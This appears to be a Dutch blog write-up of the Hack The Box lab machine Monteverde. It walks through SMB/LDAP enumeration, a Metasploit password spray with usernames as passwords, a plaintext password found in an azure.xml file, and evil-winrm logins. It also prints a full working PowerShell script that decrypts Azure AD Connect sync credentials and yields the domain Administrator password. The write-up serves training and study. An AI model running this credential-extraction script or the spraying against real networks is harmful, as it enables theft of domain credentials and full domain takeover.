Hack The Box Writeup: Monteverde

Als tweede nieuwe box in 2020 kwam Monteverde om de hoek kijken. Een Medium Windows box goed voor 30 punten voor je volgende status op Hack The Box. Persoonlijk vind ik de Windows machines leuker dan Linux, maar dat is puur omdat ik meer bezig ben met het Microsoft ecosysteem. Genoeg algemene shizzle, tijd om Monteverde te ontdekken.

They might call it the cloud but it is, in fact, just someone else’s computer.
– Mark Russinovich

Een Nmap scan a day, keeps the doctor away. Eerste even zien wat er allemaal beschikbaar is op deze Windows box. LDAP, SMB en WINRM zijn beschikbaar, grote kans dat hier een groot deel van de enumeration mee te doen is.

nmap -sC -sV -T5 -oA monteverde 10.10.10.172

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for 10.10.10.172
Host is up (0.061s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3FE556%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T11:08:14
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds

Door middel van enum4linux is er snel te zien of er accounts te achterhalen zijn, wat het domein is en eventuele groeplidmaatschappen.

enum4linux 10.10.10.172
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020

 ==========================
| Target Information |
 ==========================
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================================
| Getting domain SID for 10.10.10.172 |
 ===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 =============================
| Users on 10.10.10.172 |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]

[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
group:[Developers] rid:[0xa34]

De output geeft een aantal usernames terug maar verder geen hints naar wachtwoorden. Ik maak een tekstbestand met de usernames om door middel van de SMB_Login module in Metasploit snel te zien of er accounts kunnen aanmelden.

msfconsole                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'


       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion

Als eerste probeer ik gebruik te maken van de optie USER_AS_PASS. Deze optie zorgt ervoor dat er voor alle users in mijn userlist als wachtwoord de username gebruikt wordt. Een snelle manier om te zien of er een luie beheerder aan het werk geweest is.

msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.10.172
RHOSTS => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt

msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true 
USER_AS_PASS => true

msf5 auxiliary(scanner/smb/smb_login) > run

Failed, Failed, Failed, Success! Zo te zien is het wachtwoord van SABatchJobs simpelweg: SABatchJobs.

[*] 10.10.10.172:445 - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\Guest:Guest',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\mhope:mhope',
[-] 10.10.10.172:445 - 10.10.10.172:445 - Failed: 'MEGABANK\roleary:roleary',
[+] 10.10.10.172:445 - 10.10.10.172:445 - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Het account kan niet verbinden via Windows Remote Management. Eerst nog verder neuzen via SMB op basis van het gevonden wachtwoord van SABatchJobs.

smbclient -U SABatchJobs -L 10.10.10.172
Enter WORKGROUP\SABatchJobs's password:

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 azure_uploads Disk
 C$ Disk Default share
 E$ Disk Default share
 IPC$ IPC Remote IPC
 NETLOGON Disk Logon server share
 SYSVOL Disk Logon server share
 users$ Disk

De users$ share bevat een aantal mappen waar ik met deze credentials geen toegang heb. Het enige bestand dat zichtbaar is, is azure.xml.

smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  . D 0 Fri Jan 3 13:12:48 2020
  .. D 0 Fri Jan 3 13:12:48 2020
  dgalanos D 0 Fri Jan 3 13:12:30 2020
  mhope D 0 Fri Jan 3 13:41:18 2020
  roleary D 0 Fri Jan 3 13:10:30 2020
  smorgan D 0 Fri Jan 3 13:10:24 2020

\dgalanos
  . D 0 Fri Jan 3 13:12:30 2020
  .. D 0 Fri Jan 3 13:12:30 2020

\mhope
  . D 0 Fri Jan 3 13:41:18 2020
  .. D 0 Fri Jan 3 13:41:18 2020
  azure.xml AR 1212 Fri Jan 3 13:40:23 2020

\roleary
  . D 0 Fri Jan 3 13:10:30 2020
  .. D 0 Fri Jan 3 13:10:30 2020

\smorgan
  . D 0 Fri Jan 3 13:10:24 2020
  .. D 0 Fri Jan 3 13:10:24 2020

  524031 blocks of size 4096. 518419 blocks available

Een config file voor Azure, maar verder verwacht ik hier qua code weinig van nodig te hebben. Wat wel interessant is, is het Password. Gezien het feit dit bestand in de map van mhope staat is dit wellicht zijn wachtwoord.

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">[email protected]$</S>
    </Props>
  </Obj>
</Objs>

Na de eerste user heb ik nu een set credentials voor mhope te pakken. Naar verwachting heb ik nu ook de user-flag te pakken.

evil-winrm -i monteverde -u "megabank\mhope" -p "[email protected]$"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt

User-flag is binnen. Nu verder zoeken naar een optie om root te vinden.

*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

De machine is redelijk kaal en er is weinig interessants om doorheen te bladeren. In C:\Program Files is te zien dat deze machine voorzien is van Azure AD Connect, een stukje tooling voor het synchroniseren van je on premise Active Directory naar Azure Active Directory. Dit verwacht ik niet op een HTB-box zonder dat het een doel heeft. Wordt dit root?

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----         1/2/2020   9:36 PM                Common Files                                                                                                                                                                                            
d-----         1/2/2020   2:46 PM                internet explorer                                                                                                                                                                                       
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services                                                                                                                                                                             
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect                                                                                                                                                                
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader                                                                                                                                                       
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent                                                                                                                                                            
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync                                                                                                                                                                                 
d-----         1/2/2020   2:31 PM                Microsoft SQL Server                                                                                                                                                                                    
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0

Na wat zoeken op Google vind ik een artikel over Azure AD Connect for Red Teamers. In het artikel wordt uitgelegd hoe je door middel van een Powershell script de username en password kan dumpen van de gebruiker waarmee Azure AD Sync wordt uitgevoerd. Het script staat op de website echter werkt hij niet direct op deze box.

Na wat foutmeldingen rondom het niet kunnen verbinden heb ik wat aangepast in het script. Op de machine vond ik de map C:\Program Files\Microsoft SQL Server\mssql14.mssqlserver wat verklaard waarom het niet werkt. De connectiestring in het originele script werkt niet met deze versie van MSSQL, want MSSQL14 = Microsoft SQL Server 2017.

Onderstaande regel heb ik aangepast zodat de string werkt met de versie van MSSQL die op Monteverde geinstalleerd is.

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

Zie hier, een werkend script voor het dumpen van Azure AD Sync credentials. Zoals je kunt zien bij $client is de string anders dan het origineel uit het blog van XPN InfoSec.

# Azure-ADConnect-CredentialExtract.ps1
# Original author: Azure AD Connect for Red Teamers (XPN Adam Chester)
# Changes: adjusted  $client string for MSSQL 2017.
#

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Initial Catalog=ADSync;Trusted_Connection =yes;"

$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+]Password: " + $password.Password)

Het script heb ik lokaal op mijn laptop aangepast en opgeslagen. Via upload binnen de WIN-RM shell kun je hem eenvoudig uploaden naar de remote box.

*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1

Info: Uploading Azure-ADConnect-CredentialExtract.ps1  to C:\users\mhope\Videos\ad2.ps1
Data: 2288 bytes of 2288 bytes copied

Info: Upload successful!

And there you have it! In dit geval is het Administrator account gebruikt voor Azure AD Sync.

*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1

[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: [email protected]!

Door middel van Evil-WinRM kan ik aanmelden met de nieuw vergaarde Administrator credentials.

evil-winrm -i monteverde -u "megabank\Administrator" -p "[email protected]!"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Als laatste stap van deze box pak ik de root-flag. Hiermee is Monteverde officieel geroot!

cat c:\Users\Administrator\Desktop\root.txt 
12909612d25c8dcf6e5a07d1a804a0bc

Cookie	Duur	Omschrijving
cookielawinfo-checkbox-advertisement	1 year	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Advertisement".
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
JSESSIONID	past	Used by sites written in JSP. General purpose platform session cookies that are used to maintain users' state across page requests.
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
_GRECAPTCHA	5 months 27 days	This cookie is set by Google. In addition to certain standard Google cookies, reCAPTCHA sets a necessary cookie (_GRECAPTCHA) when executed for the purpose of providing its risk analysis.

Cookie	Duur	Omschrijving
CONSENT	16 years 4 months 12 days 3 hours 26 minutes	These cookies are set via embedded youtube-videos. They register anonymous statistical data on for example how many times the video is displayed and what settings are used for playback.No sensitive data is collected unless you log in to your google account, in that case your choices are linked with your account, for example if you click “like” on a video.
_ga	2 years	This cookie is installed by Google Analytics. The cookie is used to calculate visitor, session, campaign data and keep track of site usage for the site's analytics report. The cookies store information anonymously and assign a randomly generated number to identify unique visitors.
_gat_gtag_UA_42260686_1	1 minute	This cookie is set by Google and is used to distinguish users.
_gid	1 day	This cookie is installed by Google Analytics. The cookie is used to store information of how visitors use a website and helps in creating an analytics report of how the website is doing. The data collected including the number visitors, the source where they have come from, and the pages visted in an anonymous form.

Cookie	Duur	Omschrijving
IDE	1 year 24 days	Used by Google DoubleClick and stores information about how the user uses the website and any other advertisement before visiting the website. This is used to present users with ads that are relevant to them according to the user profile.
test_cookie	15 minutes	This cookie is set by doubleclick.net. The purpose of the cookie is to determine if the user's browser supports cookies.
VISITOR_INFO1_LIVE	5 months 27 days	This cookie is set by Youtube. Used to track the information of the embedded YouTube videos on a website.
YSC	session	This cookies is set by Youtube and is used to track the views of embedded videos.
yt-remote-connected-devices	never	These cookies are set via embedded youtube-videos.
yt-remote-device-id	never	These cookies are set via embedded youtube-videos.

Martijn

Geef een reactie Reactie annuleren

Martijn

Gerelateerde berichten

Hack The Box Writeup: Postman

Hack The Box Writeup: Open Admin

Beschermd: Hack The Box Writeup: Cache

Hack The Box Writeup: Mango

Geef een reactie Reactie annuleren

Cookies, nomnomnom!